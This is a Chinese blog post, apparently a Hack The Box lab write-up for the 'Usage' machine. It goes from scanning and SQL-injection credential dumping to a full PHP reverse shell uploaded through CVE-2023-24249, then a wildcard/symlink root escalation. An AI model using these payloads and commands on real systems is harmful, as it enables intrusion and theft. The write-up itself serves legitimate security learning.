

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/cat.jpg">
  <link rel="icon" href="/img/cat.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Backk0m">
  <meta name="keywords" content="">
  
    <meta name="description" content="写在前面，文章中的大多数内容在网上可以找到，我是为了在记录总结中学习，故此写下这篇文章 探测开放端口和服务 123456789101112131415161718192021└─# nmap -sT -sV -sC -O -p22,80 10.10.11.18 Starting Nmap 7.94SVN ( https:&#x2F;&#x2F;nmap.org ) at 2024-06-06 03:12 EDTNma">
<meta property="og:type" content="article">
<meta property="og:title" content="Usage(HTB)">
<meta property="og:url" content="http://backk0m.github.io/2024/06/09/Usage-HTB/index.html">
<meta property="og:site_name" content="Backk0m&#39;s Blog">
<meta property="og:description" content="写在前面，文章中的大多数内容在网上可以找到，我是为了在记录总结中学习，故此写下这篇文章 探测开放端口和服务 123456789101112131415161718192021└─# nmap -sT -sV -sC -O -p22,80 10.10.11.18 Starting Nmap 7.94SVN ( https:&#x2F;&#x2F;nmap.org ) at 2024-06-06 03:12 EDTNma">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/backk0m/image-bed/179.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/backk0m/image-bed/180.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/backk0m/image-bed/181.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/backk0m/image-bed/178.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/backk0m/image-bed/177.png">
<meta property="article:published_time" content="2024-06-09T10:00:24.000Z">
<meta property="article:modified_time" content="2024-07-11T05:48:17.441Z">
<meta property="article:author" content="Backk0m">
<meta property="article:tag" content="THB">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/backk0m/image-bed/179.png">
  
  
  
  <title>Usage(HTB) - Backk0m&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"backk0m.github.io","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"left","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.1.1"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Fluid</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Usage(HTB)"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2024-06-09 18:00" pubdate>
          2024年6月9日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          9 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="padding-left: 2rem; margin-right: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">Usage(HTB)</h1>
            
            
              <div class="markdown-body">
                
                <p>写在前面，文章中的大多数内容在网上可以找到，我是为了在记录总结中学习，故此写下这篇文章</p>
<p>探测开放端口和服务</p>
<figure class="highlight less"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs less">└─# <span class="hljs-selector-tag">nmap</span> <span class="hljs-selector-tag">-sT</span> <span class="hljs-selector-tag">-sV</span> <span class="hljs-selector-tag">-sC</span> <span class="hljs-selector-tag">-O</span> <span class="hljs-selector-tag">-p22</span>,<span class="hljs-number">80</span> <span class="hljs-number">10.10</span><span class="hljs-selector-class">.11</span><span class="hljs-selector-class">.18</span> <br><span class="hljs-selector-tag">Starting</span> <span class="hljs-selector-tag">Nmap</span> <span class="hljs-number">7.94S</span><span class="hljs-selector-tag">VN</span> ( <span class="hljs-attribute">https</span>:<span class="hljs-comment">//nmap.org ) at 2024-06-06 03:12 EDT</span><br>Nmap scan report for usage.htb (<span class="hljs-number">10.10</span>.<span class="hljs-number">11.18</span>)<br>Host is up (<span class="hljs-number">0.49s</span> latency).<br><br>PORT   STATE SERVICE VERSION<br><span class="hljs-number">22</span>/tcp open  ssh     OpenSSH <span class="hljs-number">8.9</span>p1 Ubuntu <span class="hljs-number">3</span>ubuntu0.<span class="hljs-number">6</span> (Ubuntu Linux; protocol <span class="hljs-number">2.0</span>)<br>| <span class="hljs-attribute">ssh-hostkey</span>: <br>|   <span class="hljs-number">256</span> <span class="hljs-attribute">a0</span>:<span class="hljs-attribute">f8</span>:<span class="hljs-attribute">fd</span>:<span class="hljs-attribute">d3</span>:<span class="hljs-number">04</span>:<span class="hljs-attribute">b8</span>:<span class="hljs-number">07</span>:<span class="hljs-attribute">a0</span>:<span class="hljs-number">63</span>:<span class="hljs-attribute">dd</span>:<span class="hljs-number">37</span>:<span class="hljs-attribute">df</span>:<span class="hljs-attribute">d7</span>:<span class="hljs-attribute">ee</span>:<span class="hljs-attribute">ca</span>:<span class="hljs-number">78</span> (ECDSA)<br>|_  <span class="hljs-number">256</span> <span class="hljs-attribute">bd</span>:<span class="hljs-number">22</span>:<span class="hljs-attribute">f5</span>:<span class="hljs-number">28</span>:<span class="hljs-number">77</span>:<span class="hljs-number">27</span>:<span class="hljs-attribute">fb</span>:<span class="hljs-number">65</span>:<span class="hljs-attribute">ba</span>:<span class="hljs-attribute">f6</span>:<span class="hljs-attribute">fd</span>:<span class="hljs-number">2</span><span class="hljs-attribute">f</span>:<span class="hljs-number">10</span>:<span class="hljs-attribute">c7</span>:<span class="hljs-number">82</span>:<span class="hljs-number">8</span>f (ED25519)<br><span class="hljs-number">80</span>/tcp open  http    nginx <span class="hljs-number">1.18</span>.<span class="hljs-number">0</span> (Ubuntu)<br>|<span class="hljs-attribute">_http-server-header</span>: nginx/<span class="hljs-number">1.18</span>.<span class="hljs-number">0</span> (Ubuntu)<br>|<span class="hljs-attribute">_http-title</span>: Daily Blogs<br><span class="hljs-attribute">Warning</span>: OSScan results may be unreliable because we could <span class="hljs-keyword">not</span> find at least <span class="hljs-number">1</span> open <span class="hljs-keyword">and</span> <span class="hljs-number">1</span> closed port<br>Aggressive OS <span class="hljs-attribute">guesses</span>: Linux <span class="hljs-number">4.15</span> - <span class="hljs-number">5.8</span> (<span class="hljs-number">96%</span>), Linux <span class="hljs-number">5.3</span> - <span class="hljs-number">5.4</span> (<span class="hljs-number">95%</span>), Linux <span class="hljs-number">2.6</span>.<span class="hljs-number">32</span> (<span class="hljs-number">95%</span>), Linux <span class="hljs-number">5.0</span> - <span class="hljs-number">5.5</span> (<span class="hljs-number">95%</span>), Linux <span class="hljs-number">3.1</span> (<span class="hljs-number">95%</span>), Linux <span class="hljs-number">3.2</span> (<span class="hljs-number">95%</span>), AXIS <span class="hljs-number">210</span>A or <span class="hljs-number">211</span> Network Camera (Linux <span class="hljs-number">2.6</span>.<span class="hljs-number">17</span>) (<span class="hljs-number">95%</span>), ASUS RT-N56U WAP (Linux <span class="hljs-number">3.4</span>) (<span class="hljs-number">93%</span>), Linux <span class="hljs-number">3.16</span> (<span class="hljs-number">93%</span>), Linux <span class="hljs-number">5.0</span> (<span class="hljs-number">93%</span>)<br>No exact OS matches for host (test conditions non-ideal).<br>Network <span class="hljs-attribute">Distance</span>: <span class="hljs-number">2</span> hops<br>Service <span class="hljs-attribute">Info</span>: <span class="hljs-attribute">OS</span>: Linux; <span class="hljs-attribute">CPE</span>: <span class="hljs-attribute">cpe</span>:/<span class="hljs-attribute">o</span>:<span class="hljs-attribute">linux</span>:linux_kernel<br><br>OS <span class="hljs-keyword">and</span> Service detection performed. Please report any incorrect results at <span class="hljs-attribute">https</span>:<span class="hljs-comment">//nmap.org/submit/ .</span><br>Nmap <span class="hljs-attribute">done</span>: <span class="hljs-number">1</span> IP address (<span class="hljs-number">1</span> host up) scanned in <span class="hljs-number">38.91</span> seconds<br></code></pre></td></tr></table></figure>

<p>然后扫描目录和子域名  发现 <code>http://admin.usage.htb</code></p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">ffuf -w <span class="hljs-regexp">/usr/</span>share<span class="hljs-regexp">/wordlists/</span>amass<span class="hljs-regexp">/subdomains-top1mil-5000.txt -u http:/</span><span class="hljs-regexp">/usage.htb/</span> -H <span class="hljs-string">&quot;Host:FUZZ.usage.htb&quot;</span> -H <span class="hljs-string">&quot;Content-Type: application/x-www-form-urlencodeed&quot;</span> -c -fs <span class="hljs-number">178</span><br></code></pre></td></tr></table></figure>

<p>我们测试的过程中 发现重置密码出存在sql注入</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs stylus">sqlmap -r <span class="hljs-number">1</span><span class="hljs-selector-class">.txt</span> <span class="hljs-attr">--level</span> <span class="hljs-number">5</span> <span class="hljs-attr">--risk</span> <span class="hljs-number">3</span> -D usage_blog -T admin_users -C username,password <span class="hljs-attr">--threads</span> <span class="hljs-number">10</span> <span class="hljs-attr">--dump</span> <span class="hljs-attr">--batch</span> <br></code></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/backk0m/image-bed/179.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight autoit"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs autoit">$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2<br></code></pre></td></tr></table></figure>

<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">└─# john <span class="hljs-comment">--wordlist=/usr/share/wordlists/rockyou.txt hash.txt</span><br><br>Created directory: /root/.john<br><span class="hljs-keyword">Using</span> <span class="hljs-keyword">default</span> <span class="hljs-keyword">input</span> <span class="hljs-keyword">encoding</span>: UTF<span class="hljs-number">-8</span><br>Loaded <span class="hljs-number">1</span> <span class="hljs-keyword">password</span> hash (bcrypt [Blowfish <span class="hljs-number">32</span>/<span class="hljs-number">64</span> X3])<br><span class="hljs-keyword">Cost</span> <span class="hljs-number">1</span> (iteration count) <span class="hljs-keyword">is</span> <span class="hljs-number">1024</span> <span class="hljs-keyword">for</span> <span class="hljs-keyword">all</span> loaded hashes<br>Will run <span class="hljs-number">4</span> OpenMP threads<br>Press <span class="hljs-string">&#x27;q&#x27;</span> <span class="hljs-keyword">or</span> Ctrl-C <span class="hljs-keyword">to</span> <span class="hljs-keyword">abort</span>, almost <span class="hljs-keyword">any</span> other key <span class="hljs-keyword">for</span> status<br>whatever1        (?) <br></code></pre></td></tr></table></figure>

<p>登录后台  搜索发现漏洞   <strong>laravel-admin任意文件上传漏洞（CVE-2023-24249）</strong></p>
<p>创建 1.jpg</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br></pre></td><td class="code"><pre><code class="hljs awk">&lt;?php<br><span class="hljs-regexp">//</span> php-reverse-shell - A Reverse Shell implementation <span class="hljs-keyword">in</span> PHP. Comments stripped to slim it down. RE: https:<span class="hljs-regexp">//</span>raw.githubusercontent.com<span class="hljs-regexp">/pentestmonkey/</span>php-reverse-shell<span class="hljs-regexp">/master/</span>php-reverse-shell.php<br><span class="hljs-regexp">//</span> Copyright (C) <span class="hljs-number">2007</span> pentestmonkey@pentestmonkey.net<br><br>set_time_limit (<span class="hljs-number">0</span>);<br><span class="hljs-variable">$VERSION</span> = <span class="hljs-string">&quot;1.0&quot;</span>;<br><span class="hljs-variable">$ip</span> = <span class="hljs-string">&#x27;10.10.16.26&#x27;</span>;<br><span class="hljs-variable">$port</span> = <span class="hljs-number">9001</span>;<br><span class="hljs-variable">$chunk_size</span> = <span class="hljs-number">1400</span>;<br><span class="hljs-variable">$write_a</span> = null;<br><span class="hljs-variable">$error_a</span> = null;<br><span class="hljs-variable">$shell</span> = <span class="hljs-string">&#x27;uname -a; w; id; sh -i&#x27;</span>;<br><span class="hljs-variable">$daemon</span> = <span class="hljs-number">0</span>;<br><span class="hljs-variable">$debug</span> = <span class="hljs-number">0</span>;<br><br><span class="hljs-keyword">if</span> (function_exists(<span class="hljs-string">&#x27;pcntl_fork&#x27;</span>)) &#123;<br>	<span class="hljs-variable">$pid</span> = pcntl_fork();<br>	<br>	<span class="hljs-keyword">if</span> (<span class="hljs-variable">$pid</span> == -<span class="hljs-number">1</span>) &#123;<br>		printit(<span class="hljs-string">&quot;ERROR: Can&#x27;t fork&quot;</span>);<br>		<span class="hljs-keyword">exit</span>(<span class="hljs-number">1</span>);<br>	&#125;<br>	<br>	<span class="hljs-keyword">if</span> (<span class="hljs-variable">$pid</span>) &#123;<br>		<span class="hljs-keyword">exit</span>(<span class="hljs-number">0</span>);  <span class="hljs-regexp">//</span> Parent exits<br>	&#125;<br>	<span class="hljs-keyword">if</span> (posix_setsid() == -<span class="hljs-number">1</span>) &#123;<br>		printit(<span class="hljs-string">&quot;Error: Can&#x27;t setsid()&quot;</span>);<br>		<span class="hljs-keyword">exit</span>(<span class="hljs-number">1</span>);<br>	&#125;<br><br>	<span class="hljs-variable">$daemon</span> = <span class="hljs-number">1</span>;<br>&#125; <span class="hljs-keyword">else</span> &#123;<br>	printit(<span class="hljs-string">&quot;WARNING: Failed to daemonise.  This is quite common and not fatal.&quot;</span>);<br>&#125;<br><br>chdir(<span class="hljs-string">&quot;/&quot;</span>);<br><br>umask(<span class="hljs-number">0</span>);<br><br><span class="hljs-regexp">//</span> Open reverse connection<br><span class="hljs-variable">$sock</span> = fsockopen(<span class="hljs-variable">$ip</span>, <span class="hljs-variable">$port</span>, <span class="hljs-variable">$errno</span>, <span class="hljs-variable">$errstr</span>, <span class="hljs-number">30</span>);<br><span class="hljs-keyword">if</span> (!<span class="hljs-variable">$sock</span>) &#123;<br>	printit(<span class="hljs-string">&quot;$errstr ($errno)&quot;</span>);<br>	<span class="hljs-keyword">exit</span>(<span class="hljs-number">1</span>);<br>&#125;<br><br><span class="hljs-variable">$descriptorspec</span> = array(<br>   <span class="hljs-number">0</span> =&gt; array(<span class="hljs-string">&quot;pipe&quot;</span>, <span class="hljs-string">&quot;r&quot;</span>),  <span class="hljs-regexp">//</span> stdin is a pipe that the child will read from<br>   <span class="hljs-number">1</span> =&gt; array(<span class="hljs-string">&quot;pipe&quot;</span>, <span class="hljs-string">&quot;w&quot;</span>),  <span class="hljs-regexp">//</span> stdout is a pipe that the child will write to<br>   <span class="hljs-number">2</span> =&gt; array(<span class="hljs-string">&quot;pipe&quot;</span>, <span class="hljs-string">&quot;w&quot;</span>)   <span class="hljs-regexp">//</span> stderr is a pipe that the child will write to<br>);<br><br><span class="hljs-variable">$process</span> = proc_open(<span class="hljs-variable">$shell</span>, <span class="hljs-variable">$descriptorspec</span>, <span class="hljs-variable">$pipes</span>);<br><br><span class="hljs-keyword">if</span> (!is_resource(<span class="hljs-variable">$process</span>)) &#123;<br>	printit(<span class="hljs-string">&quot;ERROR: Can&#x27;t spawn shell&quot;</span>);<br>	<span class="hljs-keyword">exit</span>(<span class="hljs-number">1</span>);<br>&#125;<br><br>stream_set_blocking(<span class="hljs-variable">$pipes</span>[<span class="hljs-number">0</span>], <span class="hljs-number">0</span>);<br>stream_set_blocking(<span class="hljs-variable">$pipes</span>[<span class="hljs-number">1</span>], <span class="hljs-number">0</span>);<br>stream_set_blocking(<span class="hljs-variable">$pipes</span>[<span class="hljs-number">2</span>], <span class="hljs-number">0</span>);<br>stream_set_blocking(<span class="hljs-variable">$sock</span>, <span class="hljs-number">0</span>);<br><br>printit(<span class="hljs-string">&quot;Successfully opened reverse shell to $ip:$port&quot;</span>);<br><br><span class="hljs-keyword">while</span> (<span class="hljs-number">1</span>) &#123;<br>	<span class="hljs-keyword">if</span> (feof(<span class="hljs-variable">$sock</span>)) &#123;<br>		printit(<span class="hljs-string">&quot;ERROR: Shell connection terminated&quot;</span>);<br>		<span class="hljs-keyword">break</span>;<br>	&#125;<br><br>	<span class="hljs-keyword">if</span> (feof(<span class="hljs-variable">$pipes</span>[<span class="hljs-number">1</span>])) &#123;<br>		printit(<span class="hljs-string">&quot;ERROR: Shell process terminated&quot;</span>);<br>		<span class="hljs-keyword">break</span>;<br>	&#125;<br><br>	<span class="hljs-variable">$read_a</span> = array(<span class="hljs-variable">$sock</span>, <span class="hljs-variable">$pipes</span>[<span class="hljs-number">1</span>], <span class="hljs-variable">$pipes</span>[<span class="hljs-number">2</span>]);<br>	<span class="hljs-variable">$num_changed_sockets</span> = stream_select(<span class="hljs-variable">$read_a</span>, <span class="hljs-variable">$write_a</span>, <span class="hljs-variable">$error_a</span>, null);<br><br>	<span class="hljs-keyword">if</span> (in_array(<span class="hljs-variable">$sock</span>, <span class="hljs-variable">$read_a</span>)) &#123;<br>		<span class="hljs-keyword">if</span> (<span class="hljs-variable">$debug</span>) printit(<span class="hljs-string">&quot;SOCK READ&quot;</span>);<br>		<span class="hljs-variable">$input</span> = fread(<span class="hljs-variable">$sock</span>, <span class="hljs-variable">$chunk_size</span>);<br>		<span class="hljs-keyword">if</span> (<span class="hljs-variable">$debug</span>) printit(<span class="hljs-string">&quot;SOCK: $input&quot;</span>);<br>		fwrite(<span class="hljs-variable">$pipes</span>[<span class="hljs-number">0</span>], <span class="hljs-variable">$input</span>);<br>	&#125;<br><br>	<span class="hljs-keyword">if</span> (in_array(<span class="hljs-variable">$pipes</span>[<span class="hljs-number">1</span>], <span class="hljs-variable">$read_a</span>)) &#123;<br>		<span class="hljs-keyword">if</span> (<span class="hljs-variable">$debug</span>) printit(<span class="hljs-string">&quot;STDOUT READ&quot;</span>);<br>		<span class="hljs-variable">$input</span> = fread(<span class="hljs-variable">$pipes</span>[<span class="hljs-number">1</span>], <span class="hljs-variable">$chunk_size</span>);<br>		<span class="hljs-keyword">if</span> (<span class="hljs-variable">$debug</span>) printit(<span class="hljs-string">&quot;STDOUT: $input&quot;</span>);<br>		fwrite(<span class="hljs-variable">$sock</span>, <span class="hljs-variable">$input</span>);<br>	&#125;<br><br>	<span class="hljs-keyword">if</span> (in_array(<span class="hljs-variable">$pipes</span>[<span class="hljs-number">2</span>], <span class="hljs-variable">$read_a</span>)) &#123;<br>		<span class="hljs-keyword">if</span> (<span class="hljs-variable">$debug</span>) printit(<span class="hljs-string">&quot;STDERR READ&quot;</span>);<br>		<span class="hljs-variable">$input</span> = fread(<span class="hljs-variable">$pipes</span>[<span class="hljs-number">2</span>], <span class="hljs-variable">$chunk_size</span>);<br>		<span class="hljs-keyword">if</span> (<span class="hljs-variable">$debug</span>) printit(<span class="hljs-string">&quot;STDERR: $input&quot;</span>);<br>		fwrite(<span class="hljs-variable">$sock</span>, <span class="hljs-variable">$input</span>);<br>	&#125;<br>&#125;<br><br>fclose(<span class="hljs-variable">$sock</span>);<br>fclose(<span class="hljs-variable">$pipes</span>[<span class="hljs-number">0</span>]);<br>fclose(<span class="hljs-variable">$pipes</span>[<span class="hljs-number">1</span>]);<br>fclose(<span class="hljs-variable">$pipes</span>[<span class="hljs-number">2</span>]);<br>proc_close(<span class="hljs-variable">$process</span>);<br><br><span class="hljs-keyword">function</span> printit (<span class="hljs-variable">$string</span>) &#123;<br>	<span class="hljs-keyword">if</span> (!<span class="hljs-variable">$daemon</span>) &#123;<br>		print <span class="hljs-string">&quot;$string\n&quot;</span>;<br>	&#125;<br>&#125;<br><br>?&gt;<br></code></pre></td></tr></table></figure>

<p>上传后 监听 9001端口 ，然后下载文件就会反弹shell</p>
<figure class="highlight capnproto"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs capnproto">python3 -c &#x27;<span class="hljs-keyword">import</span> pty;pty.spawn(<span class="hljs-string">&quot;/bin/bash&quot;</span>)&#x27; <span class="hljs-comment">#创建交互试终端</span><br></code></pre></td></tr></table></figure>

<p>我们查看 目录 &#x2F;home&#x2F;dash 下所有文件 当打开 <code>.monitrc</code> 文件时里面有密码，尝试登录root用户发现不可以， 但是可以登录 xander</p>
<p><img src="https://cdn.jsdelivr.net/gh/backk0m/image-bed/180.png" srcset="/img/loading.gif" lazyload></p>
<p><code>strings</code>命令用于从二进制文件中提取可打印的字符串</p>
<p>strings &#x2F;usr&#x2F;bin&#x2F;usage_management</p>
<p><img src="https://cdn.jsdelivr.net/gh/backk0m/image-bed/181.png" srcset="/img/loading.gif" lazyload></p>
<p>上述用红色箭头标注  有一个 * 通配符 <a target="_blank" rel="noopener" href="https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks">https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">cd</span> /var/www/html<br><span class="hljs-built_in">touch</span> @root.txt<br><span class="hljs-built_in">ln</span> -s /root/root.txt<br>sudo /usr/bin/usage_management<br>choose 1    	<span class="hljs-comment">#这样可以读取root.txt的内容</span><br></code></pre></td></tr></table></figure>

